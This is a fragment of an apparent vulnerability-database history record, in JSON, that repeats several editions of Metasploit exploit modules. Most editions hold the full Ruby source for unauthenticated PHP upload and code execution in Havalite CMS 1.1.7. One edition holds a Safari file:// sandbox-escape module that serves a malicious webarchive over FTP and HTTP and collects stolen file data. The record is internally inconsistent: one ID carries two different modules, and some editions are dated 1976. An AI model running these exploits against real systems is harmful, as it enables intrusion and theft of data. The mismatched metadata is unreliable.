""}, "lastseen": "2019-09-07T00:54:42", "differentElements": ["modified", "published"], "edition": 98}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-07T03:02:04", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2019-09-07T03:02:04"}, "dependencies": {"references": [{"type": "gentoo", "idList": ["GLSA-201909-06", "GLSA-201909-05", "GLSA-201909-04", "GLSA-201909-01", "GLSA-201909-02", "GLSA-201909-03"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2077-1", "OPENSUSE-SU-2019:2078-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1912-1:CAAA9", "DEBIAN:DLA-1911-1:FFE7F", "DEBIAN:DSA-4517-1:44A46", "DEBIAN:DLA-1910-1:9557C"]}, {"type": "thn", "idList": ["THN:291CB82C918B55804078A040F3258456", "THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1"]}, {"type": "mskb", "idList": ["KB3061064"]}, {"type": "exploitdb", "idList": ["EDB-ID:47356"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2591", "ELSA-2019-2663"]}, {"type": "cert", "idList": ["VU:672565"]}], "modified": "2019-09-07T03:02:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability 
found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-07T03:02:04", "differentElements": ["modified", "published"], "edition": 99}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-17T09:38:20", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2019-09-17T09:38:20"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2143-1", "OPENSUSE-SU-2019:2142-1", "OPENSUSE-SU-2019:2139-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1925-1:B2568", "DEBIAN:DLA-1924-1:DDBDB", "DEBIAN:DSA-4524-1:F2646", "DEBIAN:DLA-1922-1:6BFF9", "DEBIAN:DLA-1923-1:2C401"]}, {"type": "redhat", "idList": ["RHSA-2019:2782", "RHSA-2019:2781", "RHSA-2019:2780", "RHSA-2019:2779", "RHSA-2019:2778", "RHSA-2019:2777", "RHSA-2019:2775", "RHSA-2019:2774", "RHSA-2019:2773"]}, {"type": "ubuntu", "idList": ["USN-4133-1", "USN-4124-2"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2773"]}], "modified": "2019-09-17T09:38:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-17T09:38:20", "differentElements": ["modified", "published"], "edition": 100}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-17T11:38:48", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2019-09-17T11:38:48"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2143-1", "OPENSUSE-SU-2019:2142-1", "OPENSUSE-SU-2019:2139-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1925-1:B2568", "DEBIAN:DLA-1924-1:DDBDB", "DEBIAN:DSA-4524-1:F2646", "DEBIAN:DLA-1922-1:6BFF9", "DEBIAN:DLA-1923-1:2C401"]}, {"type": "redhat", "idList": ["RHSA-2019:2782", "RHSA-2019:2781", "RHSA-2019:2780", "RHSA-2019:2779", "RHSA-2019:2778", "RHSA-2019:2777", "RHSA-2019:2775", "RHSA-2019:2774", "RHSA-2019:2773"]}, {"type": "ubuntu", "idList": ["USN-4133-1", "USN-4124-2"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2773"]}], "modified": "2019-09-17T11:38:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-17T11:38:48", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 101}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "6ab0282c84b1bdacba91d2c2c5bcd9b7", "type": "metasploit", "bulletinFamily": "exploit", "title": "Mac OS X Safari file:// Redirection Sandbox Escape", "description": 
"Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a \"state management issue\" that allows a browser window to be navigated to a file:// URL. By dropping and loading a malicious .webarchive file, an attacker can read arbitrary files, inject cross-domain Javascript, and silently install Safari extensions.\n", "published": "2015-06-23T21:15:50", "modified": "2017-07-24T13:26:21", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1155", "https://support.apple.com/en-us/HT204826"], "cvelist": ["CVE-2015-1155"], "lastseen": "2019-09-23T07:53:50", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2019-09-23T07:53:50"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1155"]}, {"type": "zdi", "idList": ["ZDI-15-228"]}, {"type": "myhack58", "idList": ["MYHACK58:62201564175"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/SAFARI_FILE_URL_NAVIGATION"]}, {"type": "nessus", "idList": ["MACOSX_SAFARI8_0_6.NASL", "FEDORA_2016-9EC1850FFF.NASL", "FEDORA_2016-A4FCB02D6B.NASL", "FEDORA_2016-5D6D75DBEA.NASL", "FEDORA_2016-FDE7FFCB77.NASL", "UBUNTU_USN-2937-1.NASL", "FEDORA_2016-1A7F7FFB58.NASL", "OPENSUSE-2016-412.NASL", "OPENSUSE-2016-340.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:91159E4B96B0C8149A93B2FF3CF47C01"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805613", "OPENVAS:1361412562310842701", "OPENVAS:1361412562310131278", "OPENVAS:1361412562310807724", "OPENVAS:1361412562310807720", "OPENVAS:1361412562310807742", "OPENVAS:1361412562310131282"]}, {"type": "kaspersky", "idList": ["KLA10573"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14452", "SECURITYVULNS:DOC:32012", "SECURITYVULNS:VULN:14561", "SECURITYVULNS:DOC:32265"]}, {"type": "ubuntu", "idList": ["USN-2937-1"]}], "modified": "2019-09-23T07:53:50"}}, 
"objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/safari_file_url_navigation.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/format/webarchive'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::FtpServer\n include Msf::Exploit::Format::Webarchive\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X Safari file:// Redirection Sandbox Escape',\n 'Description' => %q{\n Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a\n \"state management issue\" that allows a browser window to be navigated\n to a file:// URL. By dropping and loading a malicious .webarchive file,\n an attacker can read arbitrary files, inject cross-domain Javascript, and\n silently install Safari extensions.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'joev' # discovery, module\n ],\n 'References' => [\n ['ZDI', '15-228'],\n ['CVE', '2015-1155'],\n ['URL', 'https://support.apple.com/en-us/HT204826']\n ],\n 'Platform' => 'osx',\n 'Targets' =>\n [\n [ 'Mac OS X', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jan 16 2014'\n ))\n\n\n register_options([\n OptString.new(\"URIPATH\", [false, 'The URI to use for this exploit (default is random)']),\n OptPort.new('SRVPORT', [true, \"The local port to use for the FTP server\", 8081]),\n OptPort.new('HTTPPORT', [true, \"The HTTP server port\", 8080])\n ])\n end\n\n def lookup_lhost(c=nil)\n # Get the source address\n if datastore['SRVHOST'] == '0.0.0.0'\n Rex::Socket.source_address( c || '50.50.50.50')\n else\n datastore['SRVHOST']\n end\n end\n\n def on_request_uri(cli, req)\n if req.method =~ /post/i\n data_str = req.body.to_s\n begin\n data = JSON::parse(data_str || '')\n file = record_data(data, cli)\n send_response(cli, '')\n 
print_good \"data #{data.keys.join(',')} received and stored to #{file}\"\n rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up\n file = record_data(data_str, cli)\n print_error \"Invalid JSON stored in #{file}\"\n send_response(cli, '')\n end\n elsif req.uri =~ /#{popup_path}$/\n send_response(cli, 200, 'OK', popup_html)\n else\n send_response(cli, 200, 'OK', exploit_html)\n end\n end\n\n def ftp_user\n @ftp_user ||= Rex::Text.rand_text_alpha(6)\n end\n\n def ftp_pass\n @ftp_pass ||= Rex::Text.rand_text_alpha(6)\n end\n\n def exploit_html\n %Q|\n <html><body>\n <script>\n window.onclick = function() {\n window.open(window.location+'/#{popup_path}', 'x', 'width=1,height=1');\n }\n </script>\n The page has moved. <a href='#'>Click here</a> to be redirected.\n </body></html>\n |\n end\n\n def ftp_url\n \"ftp://#{ftp_user}:#{ftp_pass}@#{lookup_lhost}:#{datastore['SRVPORT']}\"\n end\n\n def popup_html\n %Q|\n <script>\n\n function perform() {\n if (arguments.length > 0) {\n var nextArgs = Array.prototype.slice.call(arguments, 1);\n arguments[0]();\n setTimeout(function() {\n perform.apply(null, nextArgs);\n }, 300);\n }\n }\n\n perform(\n function() { opener.location = 'http://localhost:99999'; },\n function() { history.pushState.call(opener.history, {}, {}, 'file:///'); },\n function() { opener.location = 'about:blank' },\n function() { opener.history.back(); },\n function() { window.location = '#{ftp_url}'; },\n function() { opener.location = 'http://localhost:99998'; },\n function() {\n history.pushState.call(\n opener.history, {}, {},\n 'file:///Volumes/#{lookup_lhost}/#{payload_name}'\n );\n },\n function() { opener.location = 'about:blank'; },\n function() { opener.history.back(); },\n function() { if (#{datastore['INSTALL_EXTENSION']}) { opener.postMessage('EXT', '*'); window.location = '#{apple_extension_url}'; } else { window.close(); } }\n )\n\n </script>\n |\n end\n\n #\n # Handle FTP LIST request (send back the directory 
listing)\n #\n def on_client_command_list(c, arg)\n conn = establish_data_connection(c)\n if not conn\n c.put(\"425 Can't build data connection\\r\\n\")\n return\n end\n\n print_status(\"Data connection setup\")\n c.put(\"150 Here comes the directory listing\\r\\n\")\n\n print_status(\"Sending directory list via data connection #{webarchive_size}\")\n month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n m = month_names[Time.now.month-1]\n d = Time.now.day\n y = Time.now.year\n\n dir = \"-rwxr-xr-x 1 ftp ftp #{webarchive_size} #{m} #{d} #{y} #{payload_name}\\r\\n\"\n print_status dir\n conn.put(dir)\n conn.close\n\n print_status(\"Directory sent ok\")\n c.put(\"226 Transfer ok\\r\\n\")\n\n return\n end\n\n #\n # Handle the FTP RETR request. This is where we transfer our actual malicious payload\n #\n def on_client_command_retr(c, arg)\n conn = establish_data_connection(c)\n if not conn\n return c.put(\"425 can't build data connection\\r\\n\")\n end\n\n print_status(\"Connection for file transfer accepted\")\n c.put(\"150 Connection accepted\\r\\n\")\n\n # Send out payload\n conn.put(webarchive)\n conn.close\n end\n\n def volume_name\n @volume_name ||= Rex::Text.rand_text_alpha(12)\n end\n\n def payload_name\n 'msf.webarchive'\n end\n\n def popup_path\n @popup_uri ||= Rex::Text.rand_text_alpha(12)\n end\n\n def webarchive\n webarchive_xml\n end\n\n def webarchive_size\n print_status \"Webarchive_SiZE=#{webarchive_xml.length}\"\n webarchive_xml.length\n end\n\n def run\n # Start the FTP server\n print_status(\"Running FTP service...\")\n start_service\n\n # Create our own HTTP server\n # We will stay in this functino until we manually terminate execution\n start_http\n end\n\n #\n # Handle the HTTP request and return a response. 
Code borrorwed from:\n # msf/core/exploit/http/server.rb\n #\n def start_http(opts={})\n # Ensture all dependencies are present before initializing HTTP\n use_zlib\n\n comm = datastore['ListenerComm']\n if (comm.to_s == \"local\")\n comm = ::Rex::Socket::Comm::Local\n else\n comm = nil\n end\n\n # Default the server host / port\n opts = {\n 'ServerHost' => datastore['SRVHOST'],\n 'ServerPort' => datastore['HTTPPORT'],\n 'Comm' => comm\n }.update(opts)\n\n # Start a new HTTP server\n @http_service = Rex::ServiceManager.start(\n Rex::Proto::Http::Server,\n opts['ServerPort'].to_i,\n opts['ServerHost'],\n datastore['SSL'],\n {\n 'Msf' => framework,\n 'MsfExploit' => self,\n },\n opts['Comm'],\n datastore['SSLCert']\n )\n\n @http_service.server_name = datastore['HTTP::server_name']\n\n # Default the procedure of the URI to on_request_uri if one isn't\n # provided.\n uopts = {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }.update(opts['Uri'] || {})\n\n proto = (datastore[\"SSL\"] ? \"https\" : \"http\")\n print_status(\"Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}\")\n\n if (opts['ServerHost'] == '0.0.0.0')\n print_status(\" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}\")\n end\n\n # Add path to resource\n @service_path = uopts['Path']\n @http_service.add_resource(uopts['Path'], uopts)\n\n # As long as we have the http_service object, we will keep the ftp server alive\n while @http_service\n select(nil, nil, nil, 1)\n end\n end\n\n #\n # Ensures that gzip can be used. If not, an exception is generated. The\n # exception is only raised if the DisableGzip advanced option has not been\n # set.\n #\n def use_zlib\n if !Rex::Text.zlib_present? && datastore['HTTP::compression']\n fail_with(Failure::Unknown, \"zlib support was not detected, yet the HTTP::compression option was set. 
Don't do that!\")\n end\n end\n\n #\n # Returns the configured (or random, if not configured) URI path\n #\n def resource_uri\n path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))\n path = '/' + path if path !~ /^\\//\n datastore['URIPATH'] = path\n return path\n end\n\n #\n # Create an HTTP response and then send it\n #\n def send_response(cli, code, message='OK', html='')\n proto = Rex::Proto::Http::DefaultProtocol\n res = Rex::Proto::Http::Response.new(code, message, proto)\n res['Content-Type'] = 'text/html'\n res.body = html\n\n cli.send_response(res)\n end\n\n # @param [Hash] data the data to store in the log\n # @return [String] filename where we are storing the data\n def record_data(data, cli)\n name = if data.is_a?(Hash) then data.keys.first else 'data' end\n file = File.basename(name).gsub(/[^A-Za-z]/,'')\n store_loot(\n file, \"text/plain\", cli.peerhost, data, \"safari_webarchive\", \"Webarchive Collected Data\"\n )\n end\n\n #\n # Kill HTTP/FTP (shut them down and clear resources)\n #\n def cleanup\n super\n\n # Kill FTP\n stop_service\n\n # clear my resource, deregister ref, stop/close the HTTP socket\n begin\n @http_service.remove_resource(datastore['URIPATH'])\n @http_service.deref\n @http_service.stop\n @http_service.close\n @http_service = nil\n rescue\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-23T07:53:50", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 102}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-23T09:55:56", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-09-23T09:55:56"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2863", "RHSA-2019:2862", "RHSA-2019:2854", "RHSA-2019:2837", "RHSA-2019:2789", "RHSA-2019:2836", "RHSA-2019:2830", "RHSA-2019:2829", "RHSA-2019:2828", "RHSA-2019:2827"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4530-1:939B7", "DEBIAN:DLA-1929-1:430B5", "DEBIAN:DSA-4529-1:9F947", "DEBIAN:DLA-1927-1:85EEC"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2827"]}, {"type": "kitploit", "idList": ["KITPLOIT:8708017483803645203"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190921-01-DEBUG"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:88B3739C40911AEE494A457ECD8EB065"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2156-1", "OPENSUSE-SU-2019:2155-1"]}], "modified": "2019-09-23T09:55:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
